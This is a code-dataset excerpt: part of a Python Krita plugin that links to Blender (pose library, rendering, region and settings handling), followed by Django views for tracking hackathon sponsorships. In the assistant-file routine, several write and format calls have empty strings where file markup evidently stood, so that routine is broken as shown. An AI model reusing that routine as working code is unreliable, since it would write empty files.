100\n else:\n v2zx = cx + (cx - vzx) * 100\n v2zy = cy + (cy - vzy) * 100\n \n file = open(fileName,'w')\n file.write('')\n file.write(''.format(\n vxx, vxy, vyx, vyy, vzx, vzy,\n v2xx, v2xy, v2yx, v2yy, v2zx, v2zy,\n vxx - handleLength * 2, vxx - handleLength, vxx + handleLength, vxx + handleLength * 2,\n vyx - handleLength * 2, vyx - handleLength, vyx + handleLength, vyx + handleLength * 2,\n vzx - handleLength * 2, vzx - handleLength, vzx + handleLength, vzx + handleLength * 2))\n if not vxOrtho and not vyOrtho:\n file.write(''.format(1.0, 1 if not third else 0))\n else:\n if vxOrtho:\n file.write(''.format(1 if axis else 0))\n else:\n file.write(''.format(10.0))\n if vyOrtho:\n file.write(''.format(1 if axis else 0))\n else:\n file.write(''.format(10.0))\n if third:\n if vzOrtho:\n file.write(''.format(1 if axis else 0))\n else:\n 
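The message handler above wraps several widget updates in manual self.blockServerSignal = True ... False pairs so that server-driven changes are not echoed back to Blender. A context manager makes that pattern exception-safe; this is a hypothetical sketch, not part of the plugin:

    from contextlib import contextmanager

    @contextmanager
    def block_server_signal(docker):
        # Hypothetical helper: set the guard flag around widget updates that
        # originate from a server message, so the widgets' change handlers do
        # not send the same value straight back to Blender.
        docker.blockServerSignal = True
        try:
            yield
        finally:
            # Restored even if an update raises, unlike the manual True/False pairs.
            docker.blockServerSignal = False

    # e.g. inside a message branch:
    # with block_server_signal(self):
    #     self.lens.setValue(msg[1])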
file.write(''.format(10.0))\n if axis:\n if not vxOrtho:\n file.write('')\n if not vyOrtho:\n file.write('')\n if third and not vzOrtho:\n file.write('')\n \n file.write('')\n file.close()\n \n def updatePoseLibrary(self, items, clearPreviews):\n visible = len(items) > 0\n if not self.librarySeperator.isVisible() and visible:\n self.libraryForm.insertRow(1, self.librarySeperator)\n self.libraryForm.insertRow(2, self.poseArmaturesLabel, self.poseArmatures)\n elif self.librarySeperator.isVisible() and not visible:\n self.libraryForm.removeWidget(self.librarySeperator)\n self.libraryForm.removeWidget(self.poseArmatures)\n self.libraryForm.removeWidget(self.poseArmaturesLabel)\n self.librarySeperator.setVisible(visible)\n self.poseArmatures.setVisible(visible)\n self.poseArmaturesLabel.setVisible(visible)\n self.poseList.setVisible(visible)\n\n self.poseList.clear()\n self.settings.poseLib = items\n if clearPreviews:\n self.settings.posePreviews = {}\n if self.server and self.server.running and visible:\n self.server.sendMessage(('posePreviews', self.settings.poseLib[:10]))\n for name in items:\n pixels = self.settings.posePreviews.get(name)\n widget = QWidget()\n layout = QVBoxLayout()\n layout.setContentsMargins(0, 0, 0, 11)\n image = QLabel()\n image.setAlignment(Qt.AlignCenter)\n if pixels:\n image.setPixmap(QPixmap.fromImage(QImage(pixels, 128, 128, QImage.Format_RGBA8888)))\n image.setMinimumWidth(128)\n else:\n icon = instance.icon('folder-pictures')\n image.setPixmap(icon.pixmap(icon.actualSize(QSize(64, 64))))\n image.setMinimumWidth(128)\n text = QLabel(name)\n text.setAlignment(Qt.AlignCenter)\n layout.addStretch()\n layout.addWidget(image)\n layout.addStretch()\n layout.addWidget(text)\n #layout.setSizeConstraint(QLayout.SetFixedSize)\n widget.setLayout(layout)\n item = QListWidgetItem()\n item.setSizeHint(widget.sizeHint()) \n self.poseList.addItem(item)\n self.poseList.setItemWidget(item, widget)\n \n def loadPosePreview(self, name, pixels):\n if pixels:\n self.settings.posePreviews[name] = pixels\n try:\n i = self.settings.poseLib.index(name)\n widget = self.poseList.itemWidget(self.poseList.item(i)).layout().itemAt(1).widget()\n widget.setPixmap(QPixmap.fromImage(QImage(pixels, 128, 128, QImage.Format_RGBA8888))) \n except ValueError as e:\n print(e)\n \n def requestPosePreviews(self, scroll):\n item = self.poseList.itemAt(100, 100)\n i = self.poseList.row(item)\n if i >= 0 and i < len(self.settings.poseLib):\n action = self.settings.poseLib[i]\n if self.settings.posePreviews.get(action) == None:\n self.server.sendMessage(('posePreviews', [action]))\n self.settings.posePreviews[action] = False\n \n item = self.poseList.itemAt(self.poseList.width() - 100, 100)\n i = self.poseList.row(item)\n if i >= 0 and i < len(self.settings.poseLib):\n action = self.settings.poseLib[i]\n if self.settings.posePreviews.get(action) == None:\n self.server.sendMessage(('posePreviews', [action]))\n self.settings.posePreviews[action] = False\n \n def applyPose(self, item, flipped = False):\n i = self.poseList.row(item)\n if i >= 0 and i < len(self.settings.poseLib):\n action = self.settings.poseLib[i]\n self.server.sendMessage(('pose', str(self.poseArmatures.currentText()), action, flipped))\n \n def updateLibraryObjects(self):\n if not self.libraryObject:\n return\n\n self.libraryObject.clear()\n items = [name for (name, file, innerpath) in self.settings.library]\n if len(items) == 0:\n self.libraryObject.addItems([i18n(\"\")])\n self.libraryAppend.setEnabled(False)\n else:\n 
self.libraryObject.addItems(items)\n self.libraryAppend.setEnabled(True)\n\n def appendFromLibrary(self):\n i = self.libraryObject.currentIndex()\n name, file, innerpath = self.settings.library[i]\n if not os.path.isfile(file):\n abs = path.abspath(os.path.join(os.path.dirname(__file__), file))\n if os.path.isfile(abs):\n file = str(abs)\n self.server.sendMessage(('append', name, file, innerpath))\n \n def render(self):\n if not self.isLayoutEnabled(self.renderButtonLayout):\n return\n \n self.progress.setRange(0, 0)\n self.progress.show()\n self.setLayoutEnabled(self.renderButtonLayout, False)\n self.setLayoutEnabled(self.updateButtonLayout, False)\n self.server.sendMessage(('render', self.renderOverride.isChecked(), self.renderTemporary.isChecked(), self.renderOverridePath.isChecked(), self.settings.renderPath, self.renderOverrideRes.isChecked(), self.renderTransparency.isChecked()))\n \n def updateFrame(self):\n if not self.isLayoutEnabled(self.updateButtonLayout):\n return\n self.server.sendMessage(('requestFrame', True))\n \n def updateAnimation(self, render = False):\n if not self.isLayoutEnabled(self.renderButtonLayout if render else self.updateButtonLayout):\n return\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n \n dialog = QDialog(Application.activeWindow().qwindow())\n dialog.setWindowTitle(i18n(\"Render Animation\") if render else i18n(\"Update Animation\"))\n buttonBox = QDialogButtonBox()\n buttonBox.setOrientation(QtCore.Qt.Horizontal)\n buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n buttonBox.accepted.connect(dialog.accept)\n buttonBox.rejected.connect(dialog.reject)\n \n overrideGroupBox = QGroupBox(i18n(\"Override Blender's settings\"))\n overrideGroupBox.setToolTip(i18n(\"Override Blender's timeline settings\"))\n overrideGroupBox.setCheckable(True)\n\n frameRateSpinBox = QSpinBox()\n frameRateSpinBox.setRange(0, 120)\n frameRateSpinBox.setValue(d.framesPerSecond())\n frameRateSpinBox.setSuffix(i18n(\" fps\"))\n \n clipStartSpinBox = QSpinBox()\n clipStartSpinBox.setRange(0, 10000)\n clipStartSpinBox.setValue(d.fullClipRangeStartTime())\n \n clipEndSpinBox = QSpinBox()\n clipEndSpinBox.setRange(0, 10000)\n clipEndSpinBox.setValue(d.fullClipRangeEndTime())\n \n stepSpinBox = QSpinBox()\n stepSpinBox.setRange(0, 10000)\n stepSpinBox.setValue(1)\n\n temporaryCheck = QCheckBox(i18n(\"Only apply temporarily\"))\n temporaryCheck.setToolTip(i18n(\"Settings will be reverted once the animation is done\"))\n temporaryCheck.setChecked(True)\n\n overrideForm = QFormLayout()\n overrideForm.addRow(i18n(\"Clip Start:\"), clipStartSpinBox)\n overrideForm.addRow(i18n(\"Clip End:\"), clipEndSpinBox)\n overrideForm.addRow(i18n(\"Step:\"), stepSpinBox)\n overrideForm.addRow(i18n(\"Framerate:\"), frameRateSpinBox)\n overrideForm.addRow(temporaryCheck)\n overrideGroupBox.setLayout(overrideForm)\n \n overrideKritaCheck = QCheckBox(i18n(\"Adjust Krita's settings to match Blender's\"))\n overrideKritaCheck.setToolTip(i18n(\"Krita's clip settings will be set to Blender's timeline settings\"))\n overrideKritaCheck.setChecked(True)\n\n vbox = QVBoxLayout(dialog)\n vbox.addWidget(overrideGroupBox)\n vbox.addWidget(overrideKritaCheck)\n vbox.addStretch(1)\n vbox.addWidget(buttonBox)\n vbox.setSizeConstraint(QLayout.SetFixedSize)\n dialog.show()\n dialog.activateWindow()\n if dialog.exec_() == QDialog.Accepted:\n self.update.setCurrentIndex(2)\n if render:\n self.server.sendMessage(('renderAnimation', self.renderOverride.isChecked(), 
self.renderTemporary.isChecked(), self.renderOverridePath.isChecked(), self.settings.renderPath, self.renderOverrideRes.isChecked(), self.renderTransparency.isChecked(),\n                    overrideGroupBox.isChecked(), temporaryCheck.isChecked(), overrideKritaCheck.isChecked(), frameRateSpinBox.value(), clipStartSpinBox.value(), clipEndSpinBox.value(), stepSpinBox.value()))\n            else:\n                self.server.sendMessage(('requestAnimation', overrideGroupBox.isChecked(), temporaryCheck.isChecked(), overrideKritaCheck.isChecked(), frameRateSpinBox.value(), clipStartSpinBox.value(), clipEndSpinBox.value(), stepSpinBox.value()))\n            self.progress.setRange(0, 0)\n            self.progress.show()\n            self.setLayoutEnabled(self.renderButtonLayout, False)\n            self.setLayoutEnabled(self.updateButtonLayout, False)\n        \n    def saveFilenameToLayer(self, fileName, overwrite = True):\n        d = self.activeDocument if self.activeDocument else instance.activeDocument()\n        if not d or not d.rootNode():\n            return\n        l = d.nodeByName(self.settings.layerName)\n        if l == None or l == 0:\n            l = d.createNode(self.settings.layerName, 'paintLayer')\n            d.rootNode().addChildNode(l, None)\n\n        name = fileName\n        if name and self.settings.relPath and self.activeInFile:\n            name = os.path.relpath(name, os.path.dirname(self.activeInFile))\n        \n        if len(l.childNodes()) == 0:\n            l2 = d.createSelectionMask(name)\n            s = Selection()\n            s.select(0, 0, d.width(), d.height(), 255)\n            l2.setSelection(s)\n            l.addChildNode(l2, None)\n        elif overwrite:\n            l.childNodes()[0].setName(name)\n        \n    def getFilenameFromLayer(self):\n        d = self.activeDocument if self.activeDocument else instance.activeDocument()\n        l = d.nodeByName(self.settings.layerName)\n        if l and l != 0 and len(l.childNodes()) > 0:\n            name = l.childNodes()[0].name()\n            if self.settings.relPath and self.activeInFile:\n                rel = os.path.join(os.path.dirname(self.activeInFile), name)\n                if os.path.isfile(rel):\n                    name = rel\n            return name\n        return ''\n        \n    def resetRegion(self, b):\n        self.settings.region = b\n        d = self.activeDocument if self.activeDocument else instance.activeDocument()\n        w = d.width()\n        h = d.height()\n\n        self.regionX.setRange(-w, w)\n        self.regionY.setRange(-h, h)\n        self.regionWidth.setRange(1, w)\n        self.regionHeight.setRange(1, h)\n        \n        if b:\n            self.getRegionFromLayer()\n        else:\n            self.saveRegionToLayer()\n            self.regionX.setValue(0)\n            self.regionY.setValue(0)\n            self.regionWidth.setValue(w)\n            self.regionHeight.setValue(h)\n        \n        self.regionChanged()\n\n    def regionFromSelection(self):\n        select = instance.activeDocument().selection()\n        d = self.activeDocument if self.activeDocument else instance.activeDocument()\n        if select:\n            self.regionX.setValue(select.x())\n            self.regionY.setValue(select.y())\n            self.regionWidth.setValue(select.width())\n            self.regionHeight.setValue(select.height())\n        else:\n            self.regionX.setValue(0)\n            self.regionY.setValue(0)\n            self.regionWidth.setValue(d.width())\n            self.regionHeight.setValue(d.height())\n\n    def saveRegionToLayer(self):\n        d = self.activeDocument if self.activeDocument else instance.activeDocument()\n        if not d or not d.rootNode():\n            return\n        x = self.regionX.value()\n        y = self.regionY.value()\n        w = self.regionWidth.value()\n        h = self.regionHeight.value()\n        v = self.regionViewport.isChecked()\n        if x != 0 or y != 0 or w != d.width() or h != d.height() or not v:\n            self.saveFilenameToLayer('', False)\n        l = d.nodeByName(self.settings.layerName)\n        if l != None and l != 0 and len(l.childNodes()) > 0 and l.childNodes()[0].type() == 'selectionmask':\n            s = Selection()\n            s.select(x, y, w, h, 255 if v else 
127)\n l.childNodes()[0].setSelection(s)\n \n def getRegionFromLayer(self):\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n l = d.nodeByName(self.settings.layerName)\n if l != None and l != 0 and len(l.childNodes()) > 0 and l.childNodes()[0].type() == 'selectionmask':\n select = l.childNodes()[0].selection()\n if select:\n self.regionX.setValue(select.x())\n self.regionY.setValue(select.y())\n self.regionWidth.setValue(select.width())\n self.regionHeight.setValue(select.height())\n self.regionViewport.setChecked(select.pixelData(select.x(), select.y(), 1, 1)[0] != b'\\x7f')\n else:\n self.regionX.setValue(0)\n self.regionY.setValue(0)\n self.regionWidth.setValue(d.width())\n self.regionHeight.setValue(d.height())\n else:\n self.regionX.setValue(0)\n self.regionY.setValue(0)\n self.regionWidth.setValue(d.width())\n self.regionHeight.setValue(d.height())\n \n def regionChanged(self, v = 0):\n self.settings.regionX = self.regionX.value()\n self.settings.regionY = self.regionY.value()\n self.settings.regionWidth = self.regionWidth.value()\n self.settings.regionHeight = self.regionHeight.value()\n self.settings.regionViewport = self.regionViewport.isChecked()\n if self.server and self.server.running:\n self.server.sendMessage(('region', self.settings.regionX, self.settings.regionY, self.settings.regionWidth, self.settings.regionHeight, self.settings.regionViewport))\n \n def updateCyclesWarning(self, engine, shading):\n self.settings.engine = engine\n self.settings.shading = shading\n self.cyclesWarning.setVisible(engine == 'CYCLES' and shading == 3) \n\n def viewModeChanged(self, index, fromClient = False):\n self.settings.viewMode = index\n if self.server and self.server.running and not fromClient:\n self.server.sendMessage(('viewMode', index))\n self.setLayoutVisible(self.updateLayout, index < 2)\n self.viewGroup.setVisible(index < 2)\n self.updateGroup.setVisible(index < 2)\n self.libraryGroup.setVisible(index < 2)\n self.renderGroup.setVisible(index == 2)\n self.setLayoutVisible(self.currentViewLayout, index == 0)\n \n def updateModeChanged(self, index, fromClient = False):\n self.settings.updateMode = index\n if self.server and self.server.running and not fromClient:\n self.server.sendMessage(('updateMode', index))\n if self.updateRate.isVisible() and index != 0:\n self.updateForm.removeWidget(self.updateRate)\n self.updateForm.removeWidget(self.updateRateLabel)\n elif not self.updateRate.isVisible() and index == 0:\n self.updateForm.insertRow(0, self.updateRateLabel, self.updateRate)\n self.updateRate.setVisible(index == 0)\n self.updateRateLabel.setVisible(index == 0)\n self.updateSeperator.setVisible(index != 0)\n self.manualWarning.setVisible(index == 2)\n self.setLayoutVisible(self.updateButtonLayout, index != 0)\n \n def setLayoutVisible(self, layout, visible):\n for i in range(layout.count()): \n item = layout.itemAt(i)\n if item.layout():\n self.setLayoutVisible(item.layout(), visible)\n elif item.widget():\n item.widget().setVisible(visible)\n \n def setLayoutEnabled(self, layout, enabled):\n for i in range(layout.count()): \n item = layout.itemAt(i)\n if item.layout():\n self.setLayoutEnabled(item.layout(), enabled)\n elif item.widget():\n item.widget().setEnabled(enabled) \n \n def isLayoutEnabled(self, layout):\n if layout.count() == 0:\n return False\n elif layout.itemAt(0).widget():\n return layout.itemAt(0).widget().isEnabled()\n else:\n return self.isLayoutEnabled(layout.itemAt(0).layout())\n \n def readSettings(self): \n 
self.settings.blenderPath = instance.readSetting('blender_layer', 'blenderPath', '')\n self.settings.renderPath = instance.readSetting('blender_layer', 'renderPath', '/tmp/BlenderLayer')\n self.settings.layerName = instance.readSetting('blender_layer', 'layerName', 'Blender Layer')\n self.settings.relPath = instance.readSetting('blender_layer', 'relPath', 'True') == 'True'\n self.settings.navigateAlt = instance.readSetting('blender_layer', 'navigateAlt', 'True') == 'True'\n\n libraryStr = instance.readSetting('blender_layer', 'library', 'Body-chan\\\\\\\\library/bodychan-bodykun.blend\\\\\\\\Collection/BodyChan;Action/Standing;Action/Jumping////Body-kun\\\\\\\\library/bodychan-bodykun.blend\\\\\\\\Collection/BodyKun;Action/Standing////Monkey\\\\\\\\library/default.blend\\\\\\\\Object/Suzanne////Cube\\\\\\\\library/default.blend\\\\\\\\Object/Cube')\n \n self.settings.host = instance.readSetting('blender_layer', 'host', '127.0.0.1')\n portStr = instance.readSetting('blender_layer', 'port', '')\n self.settings.sharedMem = instance.readSetting('blender_layer', 'sharedMem', 'True') == 'True'\n\n self.settings.assistantsThreePoint = instance.readSetting('blender_layer', 'assistantsThreePoint', 'True') == 'True'\n self.settings.assistantsAxis = instance.readSetting('blender_layer', 'assistantsAxis', 'True') == 'True'\n \n self.settings.overrideSRGB = instance.readSetting('blender_layer', 'overrideSRGB', 'True') == 'True'\n self.settings.colorManageBlender = instance.readSetting('blender_layer', 'colorManageBlender', 'True') == 'True'\n self.settings.convertBGR = instance.readSetting('blender_layer', 'convertBGR', 'True') == 'True'\n \n self.settings.backgroundDraw = instance.readSetting('blender_layer', 'backgroundDraw', 'False') == 'True'\n lockFramesStr = instance.readSetting('blender_layer', 'lockFrames', '')\n\n try:\n self.settings.port = int(portStr)\n except ValueError:\n self.settings.port = 65432\n \n try:\n lib = []\n for e in libraryStr.split('////'):\n s = e.split('\\\\\\\\')\n lib.append((s[0], s[1], s[2]))\n self.settings.library = lib\n except IndexError:\n self.settings.library = []\n\n try:\n self.settings.lockFrames = int(lockFramesStr)\n except ValueError:\n self.settings.lockFrames = 10\n \n def writeSettings(self):\n instance.writeSetting('blender_layer', 'blenderPath', self.settings.blenderPath)\n instance.writeSetting('blender_layer', 'renderPath', self.settings.renderPath)\n instance.writeSetting('blender_layer', 'layerName', self.settings.layerName)\n instance.writeSetting('blender_layer', 'relPath', str(self.settings.relPath))\n instance.writeSetting('blender_layer', 'navigateAlt', str(self.settings.navigateAlt))\n instance.writeSetting('blender_layer', 'library', '////'.join([name + '\\\\\\\\' + file + '\\\\\\\\' + innerpath for (name, file, innerpath) in self.settings.library]))\n instance.writeSetting('blender_layer', 'host', self.settings.host)\n instance.writeSetting('blender_layer', 'port', str(self.settings.port))\n instance.writeSetting('blender_layer', 'sharedMem', str(self.settings.sharedMem))\n instance.writeSetting('blender_layer', 'assistantsThreePoint', str(self.settings.assistantsThreePoint))\n instance.writeSetting('blender_layer', 'assistantsAxis', str(self.settings.assistantsAxis))\n instance.writeSetting('blender_layer', 'overrideSRGB', str(self.settings.overrideSRGB))\n instance.writeSetting('blender_layer', 'colorManageBlender', str(self.settings.colorManageBlender))\n instance.writeSetting('blender_layer', 'convertBGR', 
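readSettings above round-trips every value through strings: booleans are compared against 'True' and integers are parsed in per-key try/except blocks. A single typed reader removes that repetition; a minimal sketch, assuming only that instance.readSetting stores and returns strings as in the code above (the helper itself is hypothetical):

    def read_typed_setting(group, key, default):
        # Hypothetical helper around Krita's readSetting, which only deals in strings.
        raw = instance.readSetting(group, key, str(default))
        if isinstance(default, bool):
            # bool must be special-cased: bool('False') would be True.
            return raw == 'True'
        try:
            return type(default)(raw)
        except (TypeError, ValueError):
            return default

    # e.g. self.settings.port = read_typed_setting('blender_layer', 'port', 65432)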
str(self.settings.convertBGR))\n instance.writeSetting('blender_layer', 'backgroundDraw', str(self.settings.backgroundDraw))\n instance.writeSetting('blender_layer', 'lockFrames', str(self.settings.lockFrames))","repo_name":"Yuntokon/BlenderLayer","sub_path":"blender_layer/blenderLayer.py","file_name":"blenderLayer.py","file_ext":"py","file_size_in_byte":76256,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"82"} +{"seq_id":"8616268476","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.db.models import Count, Q\nfrom ..models import Hackathon, Sponsorship, Lead\nfrom companies.models import Company\nfrom contacts.models import Contact\nfrom profiles.models import User\nfrom profiles.forms import UserListForm\nfrom ..forms import HackathonForm, SponsorshipForm, SponsorshipAssignOrganizersForm, SponsorshipsForUserForm\n\n@login_required\ndef sponsorships_show(request, h_pk):\n return render(request, \"sponsorships_show.html\", sponsorships_show_context(request, h_pk))\n\n@login_required\ndef sponsorships_summary(request, h_pk):\n show_ctx = sponsorships_show_context(request, h_pk)\n s = request.GET.get(\"show\")\n if s in show_ctx:\n sponsorships = show_ctx[s]\n show_type = s.replace('_', ' ')\n else:\n sponsorships = show_ctx[\"confirmed\"]\n show_type = \"confirmed\"\n\n return render(request, \"sponsorships_summary.html\", {\"sponsorships\": sponsorships, \"show_type\": show_type, \"faked\": show_type == \"uncontacted\"})\n\ndef sponsorships_show_context(request, h_pk):\n hackathon = get_object_or_404(Hackathon, pk=h_pk)\n\n def state_filter(states):\n return Sponsorship.objects.filter(hackathon=hackathon, status__in=states)\n\n def paginator_wrapper(name, obj):\n order_by = request.GET.get(f\"{name}_order_by\")\n if order_by and type(obj) != list:\n obj = obj.order_by(order_by)\n paginator = Paginator(obj, 25)\n return paginator.get_page(request.GET.get(f\"{name}_page\"))\n \n def get_q(name):\n return request.GET[\"q\"] if request.GET.get(\"q\") else request.GET.get(f\"{name}_q\")\n \n def sponsorship_wrapper(name, states):\n obj = state_filter(states).annotate(company__contacts__count=Count('company__contacts'))\n q = get_q(name)\n q_rules = lambda q: Q(company__name__icontains=q) | Q(company__industries__name__iexact=q) | Q(status__iexact=q) | Q(perks__name__iexact=q) | Q(tier__name__iexact=q)\n if q:\n if q.startswith(\"not:\"):\n q = q[4:]\n obj = obj.exclude(q_rules(q))\n else:\n obj = obj.filter(q_rules(q))\n obj = obj.select_related()\n return paginator_wrapper(name, obj.order_by(\"company__name\").distinct())\n \n def company_wrapper(name):\n companies_for_hackathon = Company.objects.filter(sponsorships__hackathon__pk=h_pk).values_list(\"pk\", flat=True)\n obj = Company.objects.exclude(pk__in=companies_for_hackathon)\n obj = obj.annotate(contacts__count=Count('contacts'))\n q = get_q(name)\n q_rules = lambda q: Q(name__icontains=q) | Q(industries__name__iexact=q)\n if q:\n if q.startswith(\"not:\"):\n q = q[4:]\n obj = obj.exclude(q_rules(q))\n else:\n obj = obj.filter(q_rules(q))\n order_by = request.GET.get(f\"{name}_order_by\")\n if order_by:\n obj = obj.order_by(order_by.replace(\"company__\", \"\"))\n else:\n obj = obj.order_by(\"name\")\n obj = obj.select_related()\n return paginator_wrapper(name, fake_sponsorship(obj.distinct()))\n\n def 
fake_sponsorship(company):\n return [Sponsorship(pk=0, company=c, tier=None, contribution=0) for c in company]\n \n confirmed = sponsorship_wrapper(\"confirmed\", [Sponsorship.CONFIRMED, Sponsorship.PAID])\n in_progress = sponsorship_wrapper(\"in_progress\", [Sponsorship.CONTACTED, Sponsorship.RESPONDED])\n dead = sponsorship_wrapper(\"dead\", [Sponsorship.GHOSTED, Sponsorship.DENIED])\n uncontacted = company_wrapper(\"uncontacted\")\n\n return {\n \"confirmed\": confirmed,\n \"in_progress\": in_progress,\n \"dead\": dead,\n \"uncontacted\": uncontacted,\n }\n\n@login_required\ndef sponsorship_new(request, h_pk):\n if request.method == \"POST\":\n form = SponsorshipForm(request.POST, hackathon=Hackathon.objects.get(pk=h_pk))\n if form.is_valid():\n sponsorship = form.save(commit=True)\n sponsorship.perks.set(form.cleaned_data[\"perks\"])\n # sponsorship.tiers.set(form.cleaned_data[\"tiers\"])\n sponsorship.save()\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:view\", h_pk=h_pk, pk=sponsorship.company.pk)\n else:\n company_pk = request.GET.get(\"company\")\n initial = {\n \"hackathon\": get_object_or_404(Hackathon, pk=h_pk),\n \"company\": get_object_or_404(Company, pk=company_pk) if company_pk else None,\n }\n form = SponsorshipForm(initial=initial, hackathon=Hackathon.objects.get(pk=h_pk))\n return render(request, \"sponsorship_new.html\", {\"form\": form})\n\n@login_required\ndef sponsorship_edit(request, h_pk, pk):\n sponsorship = get_object_or_404(Sponsorship, hackathon__pk=h_pk, company__pk=pk)\n if request.method == \"POST\":\n form = SponsorshipForm(request.POST, instance=sponsorship, hackathon=sponsorship.hackathon)\n if form.is_valid():\n sponsorship = form.save(commit=True)\n sponsorship.perks.set(form.cleaned_data[\"perks\"])\n # sponsorship.tiers.set(form.cleaned_data[\"tiers\"])\n sponsorship.save()\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:view\", h_pk=h_pk, pk=sponsorship.company.pk)\n else:\n form = SponsorshipForm(instance=sponsorship, hackathon=sponsorship.hackathon)\n return render(request, \"sponsorship_edit.html\", {\"form\": form, \"sponsorship\": sponsorship})\n\n@login_required\ndef sponsorship_delete(request, h_pk, pk):\n sponsorship = get_object_or_404(Sponsorship, hackathon__pk=h_pk, company__pk=pk)\n if request.method == \"POST\" and request.POST.get(\"delete\") == \"yes\":\n sponsorship.delete()\n messages.success(request, f\"Deleted sponsorship {sponsorship}\")\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:show\", h_pk=h_pk)\n return render(request, \"sponsorship_delete.html\", sponsorship_detail_context(request, h_pk, pk))\n\n@login_required\ndef sponsorship_detail(request, h_pk, pk):\n return render(request, \"sponsorship_detail.html\", sponsorship_detail_context(request, h_pk, pk))\n\ndef sponsorship_detail_context(request, h_pk, pk):\n company = get_object_or_404(Company, pk=pk)\n\n sponsorship = Sponsorship.objects.filter(hackathon__pk=h_pk, company__pk=pk)\n sponsorship = sponsorship[0] if sponsorship else None\n\n lead_contacts = sponsorship.leads.all().values_list('contact__id', flat=True) if sponsorship else []\n non_lead_contacts = set(company.contacts.all().values_list('id', flat=True)) - set(lead_contacts)\n\n contacts = combine_lead_and_contacts(lead_contacts, non_lead_contacts)\n\n return {\n \"sponsorship\": 
sponsorship,\n \"company\": company,\n \"contacts\": contacts,\n \"no_contacted_employees\": len(lead_contacts) == 0 if sponsorship else False\n }\n\ndef combine_lead_and_contacts(lead_contact_ids, non_lead_contact_ids):\n contacts = [{\"lead\": lead, \"contact\": lead.contact} for lead in Lead.objects.filter(contact__id__in=lead_contact_ids)]\n contacts += [{\"contact\": contact} for contact in Contact.objects.filter(id__in=non_lead_contact_ids)]\n\n return contacts\n\n@login_required\ndef sponsorships_for_user_list(request, h_pk):\n if request.POST.get(\"user\"):\n return redirect(\"hackathons:sponsorships:for_user\", h_pk=h_pk, user_pk=request.POST.get(\"user\"))\n else:\n return redirect(\"hackathons:sponsorships:for_user_all\", h_pk=h_pk)\n #form = UserListForm()\n #return render(request, \"sponsorships_for_user_list.html\", {\"form\": form})\n\ndef sponsorship_paginator(request, obj):\n q = request.GET.get('q')\n if q:\n obj = obj.filter(Q(company__name__icontains=q) | Q(company__industries__name__iexact=q) | Q(status__iexact=q) | Q(perks__name__iexact=q) | Q(tier__name__iexact=q))\n obj = obj.select_related()\n order_by = request.GET.get('order_by')\n if order_by:\n obj = obj.order_by(*order_by.split(',')).distinct()\n else:\n obj = obj.order_by(\"company__name\").distinct()\n paginator = Paginator(obj, 25)\n sponsorships = paginator.get_page(request.GET.get(\"page\"))\n return sponsorships\n\n@login_required\ndef sponsorships_for_user(request, h_pk, user_pk):\n user = get_object_or_404(User, pk=user_pk)\n obj = Sponsorship.objects.filter(hackathon__pk=h_pk, organizer_contacts__pk=user_pk)\n sponsorships = sponsorship_paginator(request, obj)\n\n return render(request, \"sponsorships_for_user.html\", {\n \"form\": UserListForm(initial={\"user\": user}),\n \"user\": user,\n \"sponsorships\": sponsorships,\n })\n\n@login_required\ndef sponsorships_for_user_all(request, h_pk):\n user_ids = set(Sponsorship.objects.filter(hackathon__pk=h_pk)\n .order_by('organizer_contacts__last_name','organizer_contacts__first_name')\n .values_list('organizer_contacts__pk', flat=True))\n user_objs = User.objects.filter(pk__in=user_ids)\n\n users = []\n for u in user_objs:\n sps = Sponsorship.objects.filter(hackathon__pk=h_pk, organizer_contacts__pk=u.pk)\n users.append({\n \"user\": u,\n \"sponsorships\": sps,\n })\n \n\n return render(request, \"sponsorships_for_user_all.html\", {\n \"form\": UserListForm(),\n \"users\": users,\n })\n\n@login_required\ndef sponsorship_assign_organizers(request, h_pk, pk):\n sponsorship = get_object_or_404(Sponsorship, hackathon__pk=h_pk, company__pk=pk)\n if request.method == \"POST\":\n form = SponsorshipAssignOrganizersForm(request.POST)\n if form.is_valid():\n users = form.cleaned_data['users']\n sp = form.cleaned_data['sponsorship']\n sp.organizer_contacts.clear()\n for u in users:\n sp.organizer_contacts.add(u)\n sp.save()\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:view\", h_pk=h_pk, pk=sponsorship.company.pk)\n else:\n initial = {\"sponsorship\": sponsorship, \"users\": User.objects.filter(sponsorships=sponsorship)}\n form = SponsorshipAssignOrganizersForm(initial=initial)\n return render(request, \"sponsorship_assign_organizers.html\", {\"form\": form, \"sponsorship\": sponsorship})\n\n@login_required\ndef sponsorships_for_user_modify(request, h_pk, user_pk):\n hackathon = get_object_or_404(Hackathon, pk=h_pk)\n user = get_object_or_404(User, pk=user_pk)\n if request.method == 
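sponsorship_paginator above combines an optional Q-object search, optional ordering and a fixed 25-row Paginator. The same shape in isolation, as a hedged sketch (the queryset and the single search field are placeholders, not the project's full filter):

    from django.core.paginator import Paginator
    from django.db.models import Q

    def search_page(request, queryset):
        # Optional ?q= filter, optional ?order_by=, then 25 rows per ?page=.
        q = request.GET.get('q')
        if q:
            queryset = queryset.filter(Q(company__name__icontains=q))
        order_by = request.GET.get('order_by')
        queryset = queryset.order_by(order_by) if order_by else queryset.order_by('pk')
        return Paginator(queryset.distinct(), 25).get_page(request.GET.get('page'))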
